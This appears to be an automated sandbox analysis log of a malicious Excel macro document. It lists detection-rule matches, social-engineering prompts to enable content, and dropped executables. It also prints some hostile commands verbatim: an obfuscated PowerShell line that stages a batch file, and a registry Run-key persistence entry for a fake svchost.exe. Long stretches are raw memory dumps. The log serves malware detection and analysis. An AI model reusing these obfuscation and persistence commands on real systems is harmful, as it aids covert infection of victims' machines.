            Source: 00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
            Source: C:\Users\user\Documents\pd.bat, type: DROPPEDMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
            Source: Document image extraction number: 0Screenshot OCR: Enable Editing from the yellow bar above 3. Once you have enabled editing, please click Enable Co
            Source: Document image extraction number: 0Screenshot OCR: Enable Content from the yellow bar above
            Source: Document image extraction number: 1Screenshot OCR: Enable Editing from the yellow bar above 3. Once you have enabled editing, please click Enable Co
            Source: Document image extraction number: 1Screenshot OCR: Enable Content from the yellow bar above
            Found Excel 4.0 Macro with suspicious formulasShow sources
            Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsInitial sample: EXEC
            Found obfuscated Excel 4.0 MacroShow sources
            Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsInitial sample: High usage of CHAR() function: 21
            Powershell drops PE fileShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ps.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\ps.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\ps.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\ps.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\ps.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_00AD1DF6 NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_00AD1DC5 NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_01F31D66 NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_01F31D30 NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_004A0F79
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_004A2840
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_004A2832
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_004A25F0
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_004A57CC
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_0040C090
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_0041A390
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00414C70
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00410C10
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00411270
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_004136C0
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00417A93
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_003C0F79
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_003C2834
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_003C2840
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_003C25F0
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_003C57CC
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_00400F87
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_00402840
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_00402832
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_004025F0
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_004057CC
            Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsOLE indicator, VBA macros: true
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: String function: 0042AFA0 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: String function: 0040FCB0 appears 97 times
            Source: ps.exe.23.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: GvthaHtVzpRh.exe.24.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: svchost.exe.27.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
            Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
            Source: dump.pcap, type: PCAPMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
            Source: 00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
            Source: C:\Users\user\Documents\pd.bat, type: DROPPEDMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
            Source: ps.exe.23.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: GvthaHtVzpRh.exe.24.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: svchost.exe.27.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@60/23@4/3
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_00AD1C7A AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_00AD1C43 AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_01F31806 AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_01F317CF AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_006B1806 AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_006B17CF AdjustTokenPrivileges,
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\D4FE0000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mtx_pthr_locked_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListMax_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-rwl_global_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_static_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_sch_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idList_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_global_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListCnt_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_once_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_obj_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_dest_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\lCYThKzk
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-global_lock_spinlock
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListNextId_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mxattr_recursive_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_max_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-cond_locked_shmem_rwlock
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_lock_shmem
            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-pthr_root_shmem
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREC70.tmpJump to behavior
            Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsOLE indicator, Workbook stream: true
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.................;...............;.......6.....`I8........v.....................K?.............l.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j.....J................T.............}..v....(K......0...............H.b.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....8O......0.................b.....$.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j.....O................T.............}..v....pP......0...............H.b.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.......;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.T.............}..v.....T...... .................b.....".......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j....8U................T.............}..v.....U......0...............H.b.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............>/.j......b...............T.............}..v....H\......0...............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j.....]................T.............}..v.....]......0...............H.b.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............>/.j......b...............T.............}..v.....b......0.......................^.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j....`c................T.............}..v.....c......0...............H.b.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............>/.j......b...............T.............}..v.....i......0.......................Z.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j.....i................T.............}..v....8j......0...............H.b.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............>/.j......b...............T.............}..v.....q......0...............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j.....q................T.............}..v....8r......0...............H.b.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......T.............}..v.....u......0.................b.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j.....v................T.............}..v.....w......0...............H.b.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......>/.j......b...............T.............}..v.....z......0.................b.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X{................T.............}..v.....{......0...............H.b.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.................;...............;.......6.....`I8........v.....................K?.............r.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................#.j.....n................T.............}..v....8o......0.................d.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....Hs......0...............8.d.....$.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../................#.j.....t................T.............}..v.....t......0.................d.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.T.............}..v.....x......0...............8.d.....".......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;................#.j....Hy................T.............}..v.....y......0.................d.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G................<.j......d...............T.............}..v.....~......0.......................`.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G................#.j......................T.............}..v....(.......0.................d.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S................<.j......d...............T.............}..v....P.......0.......................^.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S................#.j......................T.............}..v............0.................d.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._................<.j......d...............T.............}..v............0.......................`.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._................#.j....h.................T.............}..v............0.................d.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k................<.j......d...............T.............}..v............0...............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k................#.j....h.................T.............}..v............0.................d.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.T.............}..v............0...............8.d.....".......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w................#.j......................T.............}..v....0.......0.................d.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ........<.j......d...............T.............}..v............0...............8.d.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................#.j....x.................T.............}..v............0.................d.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............................@{>.....................J^>.......................B...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............m.o.d.e........./.........................$......$.J............/.................$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... .1.8.,.1. .............................*Y>.....m.o.d.e..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h.......................................................*Y>.....m.o.d.e..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............................@{>.....................J^>.......................B...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............c.o.l.o.r......./.........................$......$.J............/.................$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... .F.E. .................................*Y>.....c.o.l.o..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h.......................................................*Y>.....c.o.l.o..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h.......................................................J^>.......................B...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............s.e.t.l.o.c.a.l./.........................$......$.J............/.................$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h.......................................................*Y>.....s.e.t.l..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h..................................J....................J^>.....`{.J..............B...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............f.o.r...........`{.J....................*Y>.....X%.J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... ./.F...........`{.J....................*Y>.....X%.J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... .%.i. .i.n. ...=.4.-.5.................*Y>.....X%.J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............(.'.v.e.r.'.). .d.o. .5.................*Y>.....X%.J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............s.e.t...........d.o. .5.................*Y>.....X%.J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... .V.E.R.S.I.O.N.=.%.i...%.j. ............Y>.....s.e.t............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h................................DB.....................*Y>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............................p.C......................S>..............iB.......................$..............iB.............
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............s.e.t............\C.......................B...............C........J....x.........$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... .V.E.R.S.I.O.N.=.6...1. ................^>.....s.e.t....iB.....................h.$..............iB.............
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............................=.6...1..................^>.....s.e.t....iB.....................h.$..............iB.............
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............................`{.J....................J^>......$.J..............B...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............".6...1.". .=.=. .".1.0...0.". ..........Y>.....i.f. ............DB...............$..... .......................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............(................DB..................... .......................d1......h..v......$........................J....
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p........................................................Y>.....(................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............e.c.h.o.........}..v............................p.......T.......................8.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p............... .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........DB...............$.....0.......................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p............... ..... ..........DB......................X>......................DB.............8.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............r.e.g...........}..v............................p.......f.........................$............. ..... .........
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p........................................................X>.....r.e.g............DB.............................................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............1.>......................................_>......................DB.............x.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............n.u.l. .................................._>......................DB.............x.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p............... ..... .........d1......................ZX>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............t.i.m.e.o.u.t...}..v............................................................x.$............. ..... .........
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p............... ./.t. .2. . ............................_>.....t.i.m.e..........DB.............H.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............1.>......................................_>..... ./.t. ..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............n.u.l. .................................._>..... ./.t. ..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p............... ..... .........d1......................._>......................DB.............x.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............s.c.h.t.a.s.k.s.}..v............................p.................................$............. ..... .........
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p.......................................................J_>.....s.c.h.t..........DB.....................v.......................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............1.>.....................................:_>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............n.u.l. .................................:_>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p............... ..... .........d1......................._>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............t.i.m.e.o.u.t...}..v..............................................................$............. ..... .........
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p............... ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............1.>......................................^>..... ./.t. ..........DB.............X.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............n.u.l. ..................................^>..... ./.t. ..........DB.............X.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p............... ..... .........d1......................:_>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............r.e.g...........d1......................:_>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p........................................................^>.....r.e.g............DB.....................T.......................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p........................................................Y>........J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............). ......................................Y>........J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p................................DB.....................*Y>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............".6...1.". .=.=. .".6...3.". ............Y>.....i.f. ............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............(................DB.............................................d1......h..v......$........................J....
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p...............e.c.h.o.........}..v............................p.......6.......................8.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................p............... .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........DB...............$.....2.......................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... ..... ..........DB......................X>......................DB.............8.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............r.e.g...........}..v............................h.......I.........................$............. ..... .........
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h........................................................X>.....r.e.g............DB.............................................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............1.>......................................_>......................DB.............x.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............n.u.l. .................................._>......................DB.............x.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... ..... .........d1......................ZX>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............t.i.m.e.o.u.t...}..v....................................p.......................x.$............. ..... .........
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... ./.t. .2. . ............................_>.....t.i.m.e..........DB.............H.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............1.>......................................_>..... ./.t. ..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............n.u.l. .................................._>..... ./.t. ..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... ..... .........d1......................._>......................DB.............x.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............s.c.h.t.a.s.k.s.}..v............................h.................................$............. ..... .........
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h.......................................................J_>.....s.c.h.t..........DB.....................v.......................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............1.>.....................................:_>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............n.u.l. .................................:_>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... ..... .........d1......................._>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............t.i.m.e.o.u.t...}..v..............................................................$............. ..... .........
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............1.>......................................^>..... ./.t. ..........DB.............X.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............n.u.l. ..................................^>..... ./.t. ..........DB.............X.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... ..... .........d1......................:_>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............r.e.g...........d1......................:_>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h........................................................^>.....r.e.g............DB.....................T.......................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h........................................................Y>........J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............). ......................................Y>........J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h................................DB.....................*Y>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............".6...1.". .=.=. .".6...2.". ............Y>.....i.f. ............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............(................DB.............................................d1......h..v......$........................J....
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h........................................................Y>.....(................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............e.c.h.o.........}..v............................h...............................8.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h............... ..... ..........DB......................X>......................DB.............8.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............r.e.g...........}..v............................h.................................$............. ..... .........
